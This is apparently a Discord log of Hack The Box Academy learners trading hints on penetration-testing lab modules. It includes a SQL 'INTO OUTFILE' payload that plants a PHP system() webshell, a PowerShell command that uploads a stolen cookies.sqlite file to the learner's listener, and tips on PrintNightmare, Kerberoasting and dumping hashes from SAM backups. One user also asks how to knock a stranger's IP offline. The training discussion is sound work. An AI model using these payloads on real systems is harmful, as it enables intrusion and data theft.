#modules

1 messages · Page 24 of 1

mellow turtle
#

.-.

thorn urchin
#

I don't think I ever got the sql route to work on that challenge

vital adder
#

if you upload the with the ||ftp|| it won't run normal php for some reason

#

i only found out about that route after someone i help tell me the flag said there is multiple way

solar granite
#

Hmm it still doesn't run. I'm writing as ||SELECT "<?php system('powershell d'); ?>" INTO OUTFILE 'C:\CoreFTP\shell7.php';||
And accessing with
||┌──(kali㉿kali)-[~/htb-academy/infra/skills-easy] └─$ curl -k -H "Host: $target" --basic -u user:pass https://10.129.34.95/shell7.php <?php system('powershell d'); ?> ||

thorn urchin
#

yeah my notes unhelpfully end like half way through it.

if its any consolation the rating of the labs are totally wack, easy lab is the hardest, hard lab is medium, and the medium lab is easiest

vital adder
mellow turtle
#

btw u have to use double \ @solar granite

solar granite
vital adder
mellow turtle
#

oh

#

@solar granite dm me user and pass

#

i didnt note that

thorn urchin
solar granite
#

Works now.

#

I was indeed writing to the wrong directory

#

<?php system('whoami'); ?> works wonders

vital adder
thorn urchin
#

we all get stuck on some stupid simple stuff occasionally ¯_(ツ)_/¯

vital adder
solar granite
#

@shy warren check the discussion above, I remember you had the same issue

solar granite
#

Sure

mellow turtle
#

i was goiing to say u that xd

thorn urchin
vital adder
#

more like 100%

thorn urchin
#

that tracks

rich vortex
#

Literally the first step. Not sure how to start.

thorn urchin
#

Are you following the questions? Theyre pretty helpful guides for the order to do things. Did you skip over the scenario information about a webshell left for us?

rich vortex
thorn urchin
#

the webshell is our foothold to the network, much like the footholds throughout the module

#

only real difference is I dont think that one comes prebuilt with attack tools, so you either have to transfer them over or run a proxy

rich mulch
#

Hello @vital adder, please check your personal message. Thanks

pastel ginkgo
#

How can I get grep not to ignore everything past a \ ?

#

... discord removed it

thorn urchin
#

\

#

\\

#

escape the escape

pastel ginkgo
#

ahhh thanks

#

darn that didnt work still lol

thorn urchin
#

whats your query?

pastel ginkgo
thorn urchin
#
test if code blocks makes things readable with \ or \\
#

it does

#

are you sure its

 inlanefreight.local\
pastel ginkgo
#

Yeah results from cat

rich vortex
pastel ginkgo
#

I just want it to filter from my s onward

thorn urchin
thorn urchin
pastel ginkgo
#

hmmm nope didnt work i'm going to stare at the grep man page for a min

rich vortex
thorn urchin
#

The assessment module says the webshell was already left there for us and gives us the information on how to connect

#

Never forget to read the scoping and scenario information of an engagement 😉

brisk seal
#

i made an account on HTB academy, what modules should i do first?

thorn urchin
#

if you do, just follow the path order. If not, Getting Started is great

rich vortex
thorn urchin
#

no tool

#

its a webshell

#

point your browser at it

#

Did you do the shells and payload module yet? or did you just hop straight into this one?

rich vortex
thorn urchin
iron basin
#

Anyone care providing some guidance on foot printing medium lab? I got two sets of creds, tried to RDP in the box with both sets. One set fails while the other throws an error due to an exclamation being in the password weirdly.

rich vortex
thorn urchin
#

oh dont worry theyll probably be more questions, part 1 is pretty straightforward, but part 2 is definitely the hardest assessment Ive done so far being 60% of the way finished with the CPTS course.

#

that module sits at the 50% mark of the CPTS course and definitely has big Mid-Boss energy

pastel ginkgo
#

@thorn urchin So the way to do it turned out to be grep -i "^[s]"

thorn urchin
#

well thats certainly one way to do it

pastel ginkgo
#

was driving me nuts I was not about to hand do it xD

thorn urchin
#

I believe thatd match any lines with an S in it I think

pastel ginkgo
#

it matches first characters

thorn urchin
#

which could me more inclusive than you intend depending on your data

mighty solstice
#

hi yall

thorn urchin
mighty solstice
#

just to remind u yall im new here

thorn urchin
thorn urchin
#

this channel is for the HTB Academy module discussion. If youre looking for advice on a module youre working on you can ask here. You can even ask for s recommended module to start. If you dont have a related question to that, then you should find a more appropriate channel. Being new or not holds no weight or relevance in this channel. Experienced and new alike just sharing information and helping each other grind out modules.

mellow turtle
#

mad bro dont be rude

#

@thorn urchin

thorn urchin
#

¯_(ツ)_/¯

#

just saying skip the "im new spiel" and get to learning 🙂

mellow turtle
#

U can tell that softly

thorn urchin
#

why I prefaced with 'I dont mean this harshly' 😉

mellow turtle
#

Yeah saying that u can say all u want

#

because u prefaced

#

btw i dont want to discuss

unique valve
mellow turtle
#

u think he left @unique valve

unique valve
mellow turtle
#

yeah he left @unique valve

#

check common discord servers

unique valve
#

I checked it says HTB is a mutual server.

mellow turtle
#

not for me lol

unique valve
#

Nvm you are right

mellow turtle
#

btw losing the opportunity to learn for just that...

thorn urchin
#

¯_(ツ)_/¯

neat pine
#

What u guys talking about?

mellow turtle
#

nothing special

neat pine
#

Ok

thorn urchin
#

is this about a module 🙂 ?

neat pine
#

Oh sorry

thorn urchin
#

no worries, you can try general chat

mellow turtle
#

@idle cargo

cobalt bluff
#

Hi guys, by seeing the message above I just realised that I did not register with my uni email.
I tried to register with my uni email and it worked. So now I have two account on HTB academy.
And I don't know how to merge the two account (if it's possible).
Does anyone know who I should contact for this ?

Btw I created my HTB academy account like two days ago with my personal email, so it's not a big deal if I can't merge the two account. I'll just do the module that I completed again
||sorry if my English is bad it's not my primary language||

thorn urchin
cobalt bluff
wide river
#

have anyone use parrotOS and have this issue?

rustic sage
#

Tried also print potato and SpoolFool but none worked. There's like 300 patches missing on this machine yet...

simple grail
#

i got sum ones ip how do i boot him 84.17.35.77

obtuse lantern
shell gale
#

Hello everyone, im doing the password cracking module, I cant seem to get evil winRM to work and I get the following error message : Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine. I'm working through the PWNbox does anyone know how to get past this error?

wise nimbus
#

Is that the only message? Do you get a connection? That warning just means that you can't tab complete paths on the host you're connecting to.

rich vortex
shell gale
#

Maybe its that I was supposed to provide a user and password, as im supposed to do this after using crackmapexec, but cme didnt give me anything useful

wise nimbus
#

That does mean that you need credentials. If you'd like to DM me some screenshots of the cme output I can try to help you.

shell gale
#

sure thing, thanks, one second

rustic sage
#

is there anyone who is stuck on web request at the moment

#

i just started recently

thorn urchin
#

many people are following the cpts pathway and not near the priv esc modules yet, so you may be waiting awhile

rustic sage
thorn urchin
#

possibly, if youre absolutely certain its a module bug you can also try putting it in the erratum channel. Some of the staff look a bit closer at that one.

rustic sage
#

Thanks for you help, @thorn urchin Can't be 100% sure but this privesc is really not difficult and it worked one time, then never again. This is a GUI app, not much potential for mistakes.

thorn urchin
#

np, I wonder if its just an inherently unstable exploit

rustic sage
#

can someone help me with this module pls

#

sorry if i get annoying

south aurora
#

anyone that can help me with proxychains... I feel like I'm missing some information to the actual settings in msfconsole and what the output is supposed to look like..

dim wolf
thorn urchin
rustic sage
#

i havent said what the module is yet

dim wolf
thorn urchin
#

you said earlier with web requesta

rustic sage
#

ye

thorn urchin
#

maybe I misunderstood

#

which Module and section?

rustic sage
#

your right

#

dw

rustic sage
dim wolf
#

what's troubling you in the POST section?

south aurora
thorn urchin
autumn badge
#

can i do a ban speedrun?

#

pls

thorn urchin
#

you still have to have an end target to route through the proxy

rustic sage
thorn urchin
autumn badge
#

@carmine kiln pss

#

pls

#

gonna be quick

south aurora
#

ok so my guess its the domain with the 8080 port setting?

thorn urchin
#

let me double check cause theres like teo questions similar to that and idk which one youre on

#

okay nah

#

rhost would be the website youre testing on such as google.com

#

same with rport

#

all the proxy info goes into the PROXIES variable

south aurora
#

ok ok ok so I got msf test file

#

in burpsuite

thorn urchin
#

🙂

#

spoilers 😉

south aurora
#

Thanks, and TBH I spent an hour trying to figure it out on my own.. coming here was last resort after an hour...

thorn urchin
#

happens

#

it messed me up a little bit because I recorded the wrong format for setting the proxy in my notes

#

but that's why the practical section exists

south aurora
#

yeah.. I'm used to putting the remote IP on there vs the domain..

#

everyday learning something new, thanks guys

wide river
thorn urchin
#

pip/pip3/pipx perhaps?

dim wolf
wide river
dim wolf
# wide river

does it ask if you are OK with the solution? (when trying to install aptitude)

wide river
#

oh wait, you mean it ask the crackmapexec?

#

then no, i see nothing

dim wolf
wide river
#

oki thank you

mighty solstice
#

hi

thorn urchin
#

wb

mighty solstice
#

oh well no one is here

#

ima play some games

thorn urchin
#

reject games grind modules

loud sapphire
thorn urchin
#

@carmine kiln

novel matrix
#

Thanks. user banned

thorn urchin
# novel matrix Thanks. user banned

what would be the odds of getting the modules channel added as one of the channels people have to verify before being able to post from? seems like this channel gets a high target for such spam,trolls, ect and theyre almost always unverified accounts.

sly tapir
thorn urchin
#

Q.e.d

#

lmao

supple crest
#

Hathor machine, I can't overwrite Bginfo64.exe and reverse the shell, how do I do it?

thorn urchin
cunning plume
#

Hi, Can I tell my doubts in this channel=

#

?

supple crest
#

sorry, thank you

humble geyser
#

😄

vital adder
#

Introductory video on getting into hacking and cybersecurity.

▶ Play video

Sponsor: https://go.intigriti.com/thecybermentor
Blog Post: https://tcm-sec.com/so-you-want-to-be-a-hacker-2022-edition/
Academy: https://academy.tcm-sec.com

Timestamps:
0:00 - Introduction
0:53 - Intigriti Sponsorship
1:55 - Building a Foundation
2:10 - Important Notes
5:37 - Basic IT Skills
8:28 - Networking Skills
12:38 - Linux Skills
17:04 ...

▶ Play video
devout thorn
#

Hey guys, can anyone give me a nudge in "Windows Privilege Escalation" module?
I've tried every command in this section "Credential Theft/Other Files" but I can't find "bob_adm" credentials
EDIT: Found it! 🎉
||For anyone struggling with this one, start your search at C:\users\htb-student and include all (*.*) files||

proud pine
#

I'm doing the web proxies module, and I've only ever used burp before this. I rather like ZAP! Is it feature-rich enough to be used in a professional environment, or is burp better?

golden dust
#

hey guys

#

to active the openvpn

#

should it be a linux machine?

#

can i use kali vm?

dark lodge
#

hey guys, i'm doing "Information Gathering - Web Edition" and kind of stuck on "Active Subdomain Enumeration". If anyone if available to give me some help would be appreciate.

rustic sage
#

Hint for people wondering about people struggling on Windows Fundamentals "Which NT Version is installed" since the wording was a bit misleading for me:

||Hint: The answer is specific. E.g. "Windows 4" if the output was 4.xx.xx for the version. Don't overthink it!||

silver zenith
#

Just used sudo: hackerman

#

Really enjoying secure javascript coding 101

#

Expensive but good module

drowsy scaffold
hollow harness
#

How are you tackling the learning in HTB Academy?

  • Is it learn in HTB Academy while applying each techniques on HTB Labs
  • Or, Finish the whole CPTS/CBBH path and then go with HTB Labs?
    -Or just the HTB Academy alone?
drowsy scaffold
#

You can for exemple do all the web modules then go for a web box, after all AD modules -> AD box

hollow harness
proud pine
#

I think most modules give you a few recommended boxes, at the end.

sly tapir
feral stump
#

Though I have done some boxes too in the meantime

hollow harness
#

@feral stump may I know how much time do you spend in the academy compare to the time in the boxes?

feral stump
#

Right now much more the academy to boxes

#

I would say 70% - 30%

#

Of what I do in HTB

#

Overall

hollow harness
#

Thanks, just really struggling since I think I'm overwhelming myself with theories in academy and I think I'm losing my grip to practical hacking that can be done in Boxes in labs

feral stump
#

Yeah have kind dame feeling sometimes too

wide path
#

Hello guys, I'm doing the Windows Privilege Escalation module and I have a problem for the section Pillaging: I found the cookies.sqlite file but I have to copy it in my pwnbox to execute a script on it, the problem is how can i get this file on my pwnbox ? I cannot execute python -m http.server 8080 on the RDP Windows session so I'm stuck to get this file

proud pine
#

I think the last module of the CPTS path is a fully simulated pentest, so it makes more sense to me to finish up all the modules, before going back to doing boxes.

hollow harness
feral stump
hollow harness
feral stump
#

Thank you too buddy !! Will let you know too

vital adder
vital adder
woeful lily
#

hello

wide path
vital adder
#

wait how did you get Method Not Allowed? did you powershell curl or something?

wide path
#

I use this:

Invoke-RestMethod -Uri http://10.10.14.226:8080/ -Method Post -InFile C:\Users\Grace\cookies.sqlite -UseDefaultCredentials
vital adder
#

also check the updog output or status when you upload a file (through a browser) it should show that you are uploading the to to /upload

vital adder
#

on linux curl with updog will work fine

wide path
#

Do you know how to get this file (cookies.sqlite) into the box ?

vital adder
#

go to your updog ip in a browser and upload from there

wide path
#

How do I do that ?

vital adder
#

i can't remember which browser but there should be chrome installed or something use that

wide path
#

yeah but how am i supposed to upload a file with chrome to my box ?

vital adder
#

with updog

quasi moth
#

Hi, I'm real stuck at sqlmap essentials skills assessment. I found attack vector, but I can't find right options. Could you help me in dm please?

vital adder
#

sure shoot me a dm with your sqlmap command

wide path
# vital adder with updog

I found a better way to transfer file: I use the +home-drive option with xfreerdp and the /home directory is mounted in Windows so I can copy easily the files, thanks for your help btw

vital adder
#

oh yea i forgot you can do that with xfreerdp

#

usually i just use updog or metasploit if i don't have rdp

drowsy sedge
#

Hello im stuck on skill assesment hashcat

#

the last question

#

any help please?

lucid bloom
#

how to scan docker hosts with nmap - nmap says scanned 0 hosts

vital adder
vital adder
drowsy sedge
lucid bloom
drowsy sedge
#

cracking all hashes by sure , but i get something like "...exhausted"

vital adder
lucid bloom
#

ohhhhhhhhh

vital adder
lucid bloom
#

i am so dumm

wide path
#

Hey guys, I have the admin hash for the last question of the Pillaging section but it won't take it no matter what format I put it in. Can someone help me pls ?

devout thorn
vital adder
#

the admin hash started with ||bac|| and end with ||f26||

#

if you got the right hash but it still show wrong answer try refresh the page or a hard refresh with ctrl + shift + R

devout thorn
vital adder
#

yep

#

oh wait

#

this is just htb beginning evil hint ||try to Restore all of the backup||

wide path
#

Ok I found it, @devout thorn try every backup, there are only three and you'll find the hash which begins with ||bac||

devout thorn
#

Did I miss something? 😅

vital adder
#

oh wait what command did you use?

#

also that look corrupted

devout thorn
#

Lucky me ^^

vital adder
#

all hash from both file are the same

devout thorn
vital adder
#

oh try impacket-secretsdump

devout thorn
#

I'll try again

vital adder
vital adder
mellow turtle
#

ACTIVE DIRECTORY ENUMERATION & ATTACKS / Bleeding Edge Vulnerabilities

#

PrintNightmare attack

#

I dont know why this is not working

vital adder
#

haven't done that module of tcm have a video on that vuln if it's just normal printnightmare give that video a check

mellow turtle
#

who is tcm O.o

vital adder
#

the guy make the video that i always link to people new to this

vital adder
mellow turtle
#

ill watch the video ty tom :3

vital adder
# mellow turtle

everything look right here but you should get a call back on this

vital adder
# mellow turtle

the second ip (the one end with .255) should be your pwnbox ip and you are making / hosting the dll file in a directory named ws but in this command you are trying to access that file in a different and the wrong ip (that doesn't look like pwnbox ip ) haven't done the module anyone see this just follow the video

mellow turtle
#

its not that

#

its an attack host in an AD network

#

thats not the pwnbox

vital adder
#

oh

mellow turtle
#

and i solved it following the video

#

i just changed how i start the smbserver

mellow turtle
#

to this

vital adder
vital adder
mellow turtle
#

im dumb yes 🙂

#

xD

pastel ginkgo
#

Feel like I went about getting the answer in a werid way after I got the users account password that couldn't authenticate to squat.

wide path
vital adder
#

oh wait what?

#

so the ||sam|| and ||system|| file in ||the backup|| is the same one being used on the target machine

iron basin
#

Howdy, anyone mind nudging me the right way on the footprinting medium lab module? I got ||both set of creds and I can RDP in, but not sure how to access the SQL as the creds I have don’t work.||

iron basin
#

Never mind I got it!

rustic sage
#

Can someone help me

#

I can’t send images here but it’s about figuring out specs

thorn urchin
#

@winged hedge twice this dudes spammed this channel with his scam

woeful lily
#

Hi

brazen apex
#

Hey has anyone done the password attacks module?

chilly slate
#

is there anyone to consult Broken Authentication - Predictable Reset Token exercise? I have probably good script, but can't guess it in the end...

brazen apex
#

I'm just curious am I expected to remember most of the windows authentication process?

sly tapir
#

do you want me to dm you the script i have?

brazen dust
#

Hello everyone, I am on the module Information Gathering - Virtual Hosts, the problem I am having with the lab portion is that I am getting false positives on the enumeration of the vhosts. I have the first two flags but coming up short on the other 3 because I am not getting good names for the vhosts. Can someone point me in the right direction because I am stuck at this point

forest tapir
#

not to crack passwords

brazen apex
#

I guess im trying to ask should I study it?

#

I usually make very comprehensive notes of modules

#

windows authentication is a very bulky process

forest tapir
#

I just remember the main parts. WinLogon, lsassl and SAM/Kerberos.

#

Comprehensive notes are good tho.

#

It never hurts...

nimble idol
#

unless I need to use the IP from whatismyip ?

forest tapir
#

I've never heard of using fqdn's with responder but I might be wrong.

#

I'm not an expert. Maybe someone knows better.

nimble idol
#

hmm its on one of the starter tutorials called responder

#

it doesn't seem to get the AUTH hash

forest tapir
#

are you getting any traffic at all?

nimble idol
#

starting point -> tier 1 -> Responder

#

no nothing seems odd

#

listening on eth0

forest tapir
nimble idol
#

yea

forest tapir
#

i don't think you can pivot like that with responder. It's supposed to be used with local machines.

#

"local"

#

big air quotes of course..

#

I haven't been in Starting Point for a while. someone might know better than me..

pastel ginkgo
#

You'll probably find more help in the Starting point channel

nimble idol
#

oh I didnt see that channel oops

#

hmm I don't see it

brazen apex
#

Hey guys working on the Password Attacks module can someone point me in the direction where I can find more wordlists

#

for users and passwords

pastel ginkgo
pastel ginkgo
#

might need to link htb to your discord

brazen apex
#

Network services

#

On the first section you answer questions in

forest tapir
#

Scroll to the top and look for resources 😁

#

There's a downloadable wordlist

brazen apex
#

Oh I must have missed that

nimble idol
forest tapir
brazen apex
#

ahhh well I use the docker container

#

ill figure it out

#

thanks

#

for the help

forest tapir
#

On Discord.

nimble idol
#

oh

forest tapir
#

maybe, i dunno firShrug

brazen apex
#

I think you do

#

I still havent linked my account

#

I cannot see or access any of the main HTB stuff

#

only academy

forest tapir
#

then for sure heh..

#

should do that..

brazen apex
#

but then everyone will see im noooooob!!!!

forest tapir
nimble idol
#

ok got it

forest tapir
#

On that note, I have SMB access but no permission to view anything..

#

On the same module.

#

Password-Attacks: Network Services

silver pagoda
#

Hi guys, Im doing the Password-Attacks: Network Services
I manage to identity the correct user to log in into RDP.
However, when i try to login using xfreerdp or remmina im unable to
Is there something im missing? Any suggestions would be more then welcome

forest tapir
#

I keep getting kicked off/connection problems. It may be my internet but it's not working out for me regardless.

#

Lots of timeouts

#

yeah man, i'm just frusturated with this. I think it's my internet.

nimble idol
#

how do you figure out what your own machine's IP is on a VPN network?

sly tapir
#

Decodify is pretty legit

pastel ginkgo
tidal mango
#

Can anyone help me out on the Active Directory module?... ACL enumeration, the last question. I am either not understanding it right or not finding the answer. When I try to run the commands in the module the box mainly just hangs and doesn't return a response. The question is: What is the ObjectAceType of the first right that the forend user has over the GPO Management group?

fresh reef
#

I'm struggling too on host 1 Im feeling like im missing something... non of my payloads are landing

nimble idol
#

oh dang I was supposed to use tun0 and not eth0

#

that cleared it up

fresh reef
#

Literally me

sturdy kite
#

Is there a section walkthrough on setting up VM for MacOS?

sturdy kite
sly tapir
#

i saw something on there before when I installed it on my desktop

sturdy kite
sly tapir
#

good question

sturdy kite
tidal mango
tidal mango
sturdy kite
tidal mango
sturdy kite
#

also, it sounds like using VMs is a necessary evil for pen testing, in order to allow for easy spin-up/tear-down of different envs, etc

tidal mango
sturdy kite
tidal mango
sturdy kite
tidal mango
#

VirutalBox would by my recommendation, in my little playing with OSX it worked great and its pretty much the same if you use it on Linux or Windows

sturdy kite
#

do you know the different between virtualbox and vagrant?

#

i guess my main questions is: what is vagrant? lol

tidal mango
fathom mango
#

mani thanks my friend, i was stuck for two days on this😎

rustic sage
#

Im doing lfi file inclusion prevention
Im having some trouble finding the php.ini file in file inclusion prevention

#

someone please help me out

#

or give me some hints

wide river
#

#module: Password Attack
#section: Network Service
#Question:Find the user for the RDP service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.

I cannot use xfreerdp to connect to the machine even tho i already have username and password, what should i do

hollow hinge
ripe terrace
#

I'm on the INTRODUCTION TO BASH SCRIPTING module -> Comparison Operators. I can't tell if this is poorly written or I'm misunderstanding the question. Where does the Else fit into the equation?

Create an "If-Else" condition in the "For"-Loop that checks if the variable named "var" contains the contents of the variable named "value". Additionally, the variable "var" must contain more than 113,450 characters. If these conditions are met, the script must then print the last 20 characters of the variable "var". Submit these last 20 characters as the answer.

placid quest
#

@wide river try rdesktop

wide river
placid quest
#

@wide river so u need to first enable rdp

wide river
placid quest
#

@wide river no

wide river
#

what command should i use to enable it?

placid quest
#

@wide river read in the section about how to enable rdp

wide river
simple zephyr
loud pagoda
#

I use a VM for my hacking. With a decent computer now a days it’s possible to hack on any host OS.

#

I’ve got a question: dig url -t NS cannot reach the domain even though I added the up and domain to my /etc/hosts file.

#

It only works if I add the IP like: dig url @rustic sage -t NS

#

I can’t transfer the domain to the name server on the module

simple zephyr
loud pagoda
#

Is there another file on Linux I must edit to allow this to work?

placid quest
#

@wide river use evil-winrm to enable the rdp

vital adder
wide river
sly tapir
#

Broken Authentication/Brute Forcing Cookies/Question #2 Log in to the target application and tamper the rememberme token to give yourself super user privileges. After escalating privileges, submit the flag as your answer. I have tried all the roles I can think of and cant get this thing...any other hints?

vital adder
vital adder
vital adder
loud pagoda
wide river
loud pagoda
#

When I try to do the zone transfer the command won’t work

vital adder
vital adder
loud pagoda
#

Rgr, thanks. I’ll hit you up.

vital adder
placid quest
#

@wide river no problem

wide path
#

Hello guys, I struggle with the Windows Privilege Escalation Assessment part 1 question 2 to find the ldapadmin password. I tried to ||findstr /spin "ldapadmin" *.*|| but can't get the password, can someone help me pls ?

vital adder
wide path
rustic sage
#

On the Active Directory / Privileged Access, i can't RDP to the box somehow. Both with remmina or xfreerdp (with and without password). Is it just me? This is so frustrating

#

Active Directory / Bleeding Edge Vulnerabilities, there is a problem to connect to the box with user forend. Works with htb-student though

pastel ginkgo
#

For AD Enumeration, for the life of me I cant get the Ace Object type for the user forend for GPO management. I can literally see what it is in bloodhound but for what ever reason htb is saying thats not the right answer and its driving me nuts e.e

#

I've tried running the || Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$.SecurityIdentifier -eq $sid} -Verbose || cmd but its been running now for 15 mins and its still running .__.

thorn urchin
pastel ginkgo
#

god dmaet let me reset the box then i killed it thinking it broke or something like 5 times now and I only have like 20 mins left x)

pastel ginkgo
#

So why exactly do we need to change the SPN on the targeted user to Kerberoast them?

thorn urchin
#

we dont need to change the spn, they need to HAVE a spn. If they dont hsve a spn you have to add one.

pastel ginkgo
#

So if I understand correctly, its to tie to a "service" hence why the "machine" is going to Kerberos to request a tgs ?

#

Since under normal operations it just wouldnt be going to the Kerberos service for no reason at all, its to tie it to "something"?

raven cairn
#

https://youtu.be/-3MxoxdzFNI
I found this video to be really helpful for understanding kerberoasting

Kerberoasting is an extremely useful attack method to establish persistence, lateral movement, or privilege escalation in a Windows Active Directory environment. This attack is caused by a user requesting a TGS for an account, typically a service account, that has a Service Principal Name (SPN) associated with it. An attacker could then use the ...

▶ Play video
pastel ginkgo
#

Great video

solar granite
#

This is probably really simple, but for attacking common services - hard lab, how do I run a multi-line SQL query with impacket-mssqlclient? I found credentials for a user, I know what to do, but I can't for the life of me get the multi-line query to work, as it executes every line as I write them.
Edit: connected as impacket-mssqlclient -p PORT -windows-auth USER:'PASS'@IP

Edit: it was indeed really simple. Just run the whole query as a single command, with no newlines

storm jackal
#

what query are you trying to run

#

for some commands on that module i just ran them one at a time

solar granite
thorn urchin
#

idk something like that was never necessary for me in that lab

storm jackal
#

oh okay, looking through my notes, i was able to get that whole query to run

#

make sure there are no hidden new line characters, this happens sometimes when copying and pasting commands

solar granite
storm jackal
#

not sure why that is. do you have semi colons that separate? i have a screenshot of this command working and it's output if that would help

solar granite
#

Could you connect with sqsh?

storm jackal
storm jackal
plain stream
#

?

woeful karma
#

hey! I've just started hackthebox and im doing the "Linux Fundamentals" module. I've just done a question that asked "What is the path to the htb-students mail?" after logging into htb-student remotely. I got it right but I had to google the answer because I was lost. Can someone explain to me how people knew the path to "mail" would be shown by using the "env" command?

solar granite
plain stream
#

what you guys doing

solar granite
storm jackal
#

no problem! glad it worked

solar granite
woeful karma
#

I'm now being asked "Which kernel version is installed on the system? (Format: 1.22.3)". I've just done "uname -v" and copied the output and pasted it as my answer but it says I'm wrong?

solar granite
woeful karma
#

#126-Ubuntu SMP Wed Oct 21 09:40:11 UTC 2020 thats my output

solar granite
#

You don't have to copy-paste the whole output, you can just grab what you need

solar granite
woeful karma
#

oh yeah i got it, i swear thats the release tho?

solar granite
wide path
devout thorn
solar granite
#

For attacking common services - hard lab: is it possible to also get a reverse shell? I can read the flag, just wondering about a shell

wide path
wide path
sly tapir
#

damn i just finished that brute forcing cookies lesson...i was fighting myself the whole time

rustic sage
#

I'm having this issue thsts been raised in the past, could someone explain this?
It feels like the question is worded kind of confusingly.

Am I meant to create
"if counter = 35
Echo $variable | wc -c"
?

#

I've read through the module a few times but I may be overthinking it or something. Could use a nudge or helping hand with the wording if anyone has the time!

devout thorn
solar granite
wide path
rustic sage
placid quest
#

@solar granite u are still stuck or

rustic sage
#

Hello, I'm currently working on the web attack module at Mass IDOR Enumeration. I found out the http method with Burp Suite. I just have no idea how to enter the parameter with curl on POST. Thanks for the help in advance

sly tapir
kind turret
#

@rustic sage

-d "uid=$i"
solar granite
placid quest
#

@solar granite yes it is possible while using powershell

woeful karma
#

in the linux fundamentals module, specifically in the "service and process management" section, the question asks Use the "systemctl" command to list all units of services and submit the unit name with the description "Load AppArmor profiles managed internally by snapd" as the answer. I've done systemctl list-units --type=service | grep apparmor and it returned only 1 unit. The description of that unit is "Load AppArmor profiles" so i assumed that was it since it's the only unit returned. I entered the name of the unit as my answer and it says im wrong.

rustic sage
#

@sly tapir @kind turret thanks I will try both variants

kind turret
woeful karma
#

cuz it gives me an error

kind turret
#

Yes as we are using regex

woeful karma
kind turret
#

DM me with what you are submitting as the answer

rustic sage
kind turret
sly tapir
#

mybad, i totally misread that... yea -d "" 😬

rustic sage
#

do I need the -H parameter too? Because somehow I still get no result with -d

kind turret
#

@rustic sage DM me

kind turret
woeful mural
#

Anyone in the AD section?

#

Anyone having or seen this issue in mimikatz?

forest tapir
#

Is there a reason I can log in to SMB and not being able to list/open anything??

#

I'm on a share but have zero permission for anything.

#

I've never encountered this before. I've never heard of such a thing.

thorn urchin
#

yeah can def happen

forest tapir
#

Every google entry is related to "I can't login to SMB"...

#

Not relevant to what i'm trying to find.

#

If it's configured to not let me access anything, can I really do anything about it?

#

I would think not....

thorn urchin
#

you can probably use the connection for some enumeration tasks but that's probably about it

forest tapir
#

I'm supposed to grab the flag from it, I believe.

thorn urchin
#

find a better user perhaps

forest tapir
#

It's the password attack module.

thorn urchin
#

which section

forest tapir
#

the network services section

#

I could try to find another user. I swear I didn't find one.

sturdy kite
#

just subscribed to HTB academy! 😎

forest tapir
#

idk how i've missed a second user... NotLikeThis

thorn urchin
#

thatd do it

forest tapir
#

I must be blind

thorn urchin
#

alright I got the XSS module up next and I absolutely hate XSS blehhhhhhh

#

hopefully I can just use my dislike of xss to power through it

still violet
#

any hints on how to read source code in file upload assessment?

sturdy kite
#

hi, im trying to use nmap --script smb-os-discovery -p445 <host> but not seeing any output for the script, any ideas?

#

ah... i added the -d flag and now see this

Host script results:
| smb-os-discovery: 
|_  ERROR: Could not negotiate a connection:SMB: ERROR: Server returned less data than it was supposed to (one or more fields are missing); aborting [9]
#

what does this mean?

woeful mural
#

Did you put the ip?

#

@sturdy kite Looks like you need a space after the p and the ip?

deft fractal
#

-p445 is port number

sturdy kite
#

the command is correct, im getting an error in the script for smb-os-discovery

thorn urchin
#

iirc I think smb-os-discovery actually requires more ports than just 445 cause I think it tries to fetch some of the standard rpc information. Id have to double check

#

not required but does sometimes use 139 as well

#

so try -p445,139

sturdy kite
#

let me try that

#

the module im going through shows usage without port 139 though

thorn urchin
#

which module/section?

sturdy kite
#

another issue im having is with SMB client: Error opening local file flag.txt

#

when running get <filename>

sturdy kite
thorn urchin
#

dont really need to do smb-os-discovery for this one, but give me a moment and ill see if I get an error

sturdy kite
thorn urchin
#

ah its a samba one

#

samba likes to hide info

sturdy kite
#

so the error is expected?

thorn urchin
#

I didnt get an error, I just go no output at all, which can be normal yeah

sturdy kite
#

did u use the -d flag?

thorn urchin
#

nah

#

with -d yeah I do see the error

#

but yeah normal for samba

sturdy kite
thorn urchin
#

what were you trying to run

sturdy kite
#

get flag.txt

mellow turtle
#

send us a image of the directory where the flag is

#

@sturdy kite

sturdy kite
mellow turtle
#

try : get ./flag.txt

sturdy kite
mellow turtle
#

get flag.txt flag.txt

#

?¿

sturdy kite
mellow turtle
sturdy kite
mellow turtle
#

wtf

sturdy kite
#

lol

mellow turtle
#

try get /flag/flag.txt

thorn urchin
#

are you connected as the correct user for that?

sturdy kite
#

bob

thorn urchin
#

what directory are you launching smbclient from

sturdy kite
#

users

thorn urchin
#

and do you have write access to users

sturdy kite
sturdy kite
mellow turtle
#

launch it from ur user

#

directory

thorn urchin
#

youre launching from /root

#

as normal user

#

youre not gunna have write perms to /root

mellow turtle
#

cd ~

sturdy kite
#

ohhhhhhhh

mellow turtle
#

or use sudo

sturdy kite
#

ughhhh

#

yup

#

thanks guys

mellow turtle
#

._.

sturdy kite
#

launched from bad dir 😅

thorn urchin
#

np Ive done it before while inside /opt/ and using some tools

mellow turtle
#

i got that mistake often too

#

xD

sturdy kite
#

what a misleading error message lol

thorn urchin
#

well it did say it had an error with the local file lol

mellow turtle
#

yeah

#

that was confusing

sturdy kite
thorn urchin
#

¯_(ツ)_/¯

sturdy kite
#

lmao

#

anyways, thanks

sly tapir
#

anyone have a good resource where i can filter lists? trying to filter a list to delete lines with no special characters

sturdy kite
sly tapir
# solar granite What do you mean?
``` i am filtering a list to meet specific requirements... but there are lines with no special characters in there and i want to delete them
sturdy kite
#

i think grep is essentially the same thing, really it sounds like you are looking for a pattern (regex) to match lines with special chars

sly tapir
#

yea im filtering it based off password requirements

sturdy kite
#

i would just search for regex patterns that fit what you want

sly tapir
raven cairn
#

I know a bit but this kinda sus ngl

#

Illegal stuff isn't allowed here.

#

<@&861185840277487616>

#

No and learn OPSEC.

raven cairn
#

Go to hackthebox academy.

raven cairn
#

Thank you NightWolf56 prayge

thorn urchin
#

Welp thats the xss module down. Plus side I hate xss so it being really simple made it easy to blitz through. Downside is that it was super simple and did nothing to alter my annoyance at xss.

raven cairn
#

Gj!!!!

thorn urchin
#

almost at that 70% mark

raven cairn
thorn urchin
#

cpts

raven cairn
#

Nice!!!

#

I am at 82% but FInals week at uni is killing me

#

I have no time Sad_Squidward_Pepe

rustic sage
#

how do you find php.ini files on websites

#

with file inclusion attack

raven cairn
#

